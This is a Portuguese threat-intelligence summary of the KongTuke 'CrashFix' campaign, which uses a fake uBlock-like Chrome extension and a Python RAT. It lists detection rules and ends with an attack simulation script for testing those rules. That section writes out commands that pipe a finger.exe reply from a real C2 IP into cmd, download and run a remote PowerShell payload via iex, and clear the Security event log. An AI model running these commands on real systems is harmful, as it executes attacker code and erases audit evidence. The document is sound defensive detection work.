SOC Prime Bias: Crítico

21 Jan 2026 16:34 UTC

Dissecando o CrashFix: O Novo Brinquedo de KongTuke

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Dissecando o CrashFix: O Novo Brinquedo de KongTuke
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

KongTuke distribuiu uma extensão maliciosa do Chrome, NexShield, imitando o uBlock Origin Lite. Uma vez instalada, ela exibe um aviso de segurança “CrashFix” para simular um incidente legítimo de segurança do navegador, travando o navegador e coagindo o usuário a executar um comando malicioso de PowerShell copiado para a área de transferência. A campanha implanta um RAT Python, ModeloRAT, em sistemas conectados ao domínio e uma cadeia multiestágio de PowerShell em hosts independentes.

Investigação

Os analistas da Huntress revisaram o código da extensão, vincularam o comando e controle ao nexsnield.com e realizaram engenharia reversa das cargas úteis. Eles observaram o abuso do finger.exe como um LOLBin para recuperar instruções do invasor, além de um DGA que gera domínios .top. Para ambientes em um domínio, os pesquisadores identificaram um implante Python criptografado com RC4 que persiste através da chave Run do HKCU. Técnicas adicionais incluíram verificações de anti-análise, bypass da AMSI, e táticas de exaustão de recursos destinadas a pressionar os usuários a uma conformidade total rápida.

Mitigação

Bloqueie o ID da extensão do Chrome e monitore extensões desconhecidas que imitam bloqueadores de anúncios populares. Detecte beaconing para nexsnield.com, os IPs de C2 e domínios produzidos por DGA. Aplique controle de execução para limitar o uso de LOLBin (incluindo finger.exe) e alerte sobre valores suspeitos de chave Run, particularmente nomes criados para se assemelhar a softwares amplamente utilizados.

Resposta

Alerta sobre instalações de extensões relacionadas ao NexShield e correlacione com conexões de saída para a infraestrutura C2 e DGA identificada. Isole hosts afetados e colete artefatos de extensão, chaves de registro Run, tarefas agendadas e arquivos descartados. Remova a persistência do ModeloRAT, erradique componentes de estágio PowerShell e remedeie e valide o endpoint.

Fluxo de ataque

Detecções

Chamar Métodos .NET Suspeitos a partir do Powershell (via powershell)

Equipe SOC Prime
21 Jan 2026

Uso suspeito de CURL (via linha de comando)

Equipe SOC Prime
21 Jan 2026

Nome de Arquivo Curto (via linha de comando)

Equipe SOC Prime
21 Jan 2026

Possível Operação Manual ou de Script foi Realizada em Pastas Incomuns (via linha de comando)

Equipe SOC Prime
21 Jan 2026

Strings Suspeitas do Powershell (via powershell)

Equipe SOC Prime
21 Jan 2026

Chamar Funções de API do Windows Suspeitas a partir do Powershell (via powershell)

Equipe SOC Prime
21 Jan 2026

Possíveis Pontos de Persistência [ASEPs – Hive de Software/NTUSER] (via evento de registro)

Equipe SOC Prime
21 Jan 2026

Um Arquivo foi Extraído para um Diretório Suspeito Usando o Powershell (via powershell)

Equipe SOC Prime
21 Jan 2026

Execução de Python a partir de Pastas Suspeitas (via linha de comando)

Equipe SOC Prime
21 Jan 2026

Possíveis Indicadores de Ofuscação do Powershell (via powershell)

Equipe SOC Prime
21 Jan 2026

Possível Enumeração do Sistema (via linha de comando)

Equipe SOC Prime
21 Jan 2026

Download ou Upload via Powershell (via linha de comando)

Equipe SOC Prime
21 Jan 2026

IOCs (SourceIP) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke

Regras de IA SOC Prime
21 Jan 2026

IOCs (HashSha256) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke

Regras de IA SOC Prime
21 Jan 2026

IOCs (DestinationIP) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke

Regras de IA SOC Prime
21 Jan 2026

IOCs (Emails) para detectar: Dissecando CrashFix: Novo Brinquedo de KongTuke

Regras de IA SOC Prime
21 Jan 2026

Detectar Execução de Comando Malicioso do KongTuke CrashFix [Criação de Processo do Windows]

Regras de IA SOC Prime
21 Jan 2026

Detecção de Bypass da AMSI e Remoção de Evidências via PowerShell [Windows Powershell]

Regras de IA SOC Prime
21 Jan 2026

Execução de Simulação

Pré-requisito: A Verificação de Telemetria e Linha de Base Pré-voo deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa do Ataque e Comandos:
    O adversário primeiro copia o legítimo finger.exe binário para o diretório temporário, renomeia-o para ct.exe, e então usa um cmd /c aninhado para invocar o binário copiado com um argumento elaborado que contacta um servidor remoto C2 (199.217.98.108). O binário transmite a carga de volta para a linha de comando, que então é enviada para um segundo cmd oculto que executa o código recebido. Depois, o invasor usa o PowerShell para baixar uma carga secundária via Invoke‑WebRequest e imediatamente a executa com iex. Todas as etapas são realizadas com interface de usuário mínima (/min) para evitar a detecção pelo usuário.

     1. Copiar finger.exe → %TEMP%ct.exe
      2. Executar: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"
      3. Baixar & executar carga secundária com PowerShell:
         powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
  • Script de Teste de Regressão: O script abaixo reproduz toda a cadeia de ataque em uma máquina de teste Windows. Execute-o em uma sessão de PowerShell com privilégios elevados.

    #-------------------------------------------------
    # Execução de Comando Malicioso KongTuke CrashFix
    #-------------------------------------------------
    # 1. Implantar o LOLBin (finger.exe) para %TEMP% como ct.exe
    $fingerPath = "$env:windirsystem32finger.exe"
    $tempExe    = "$env:TEMPct.exe"
    Copy-Item -Path $fingerPath -Destination $tempExe -Force
    
    # 2. Executar a cadeia de comando malicioso (corresponde à regra Sigma)
    $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"'
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden
    
    # 3. Download web do PowerShell e execução de carga secundária
    $payloadUrl = 'http://199.217.98.108/payload.ps1'
    $psCommand  = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden
    #-------------------------------------------------
  • Comandos de Limpeza: Remova artefatos e finalize quaisquer processos remanescentes criados pelo teste.

    # Delete the copied ct.exe
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # Kill any stray cmd.exe or powershell.exe processes started by the test (filter by specific command line)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # Optional: clear Event Log if needed for repeatability
    # wevlutil cl Security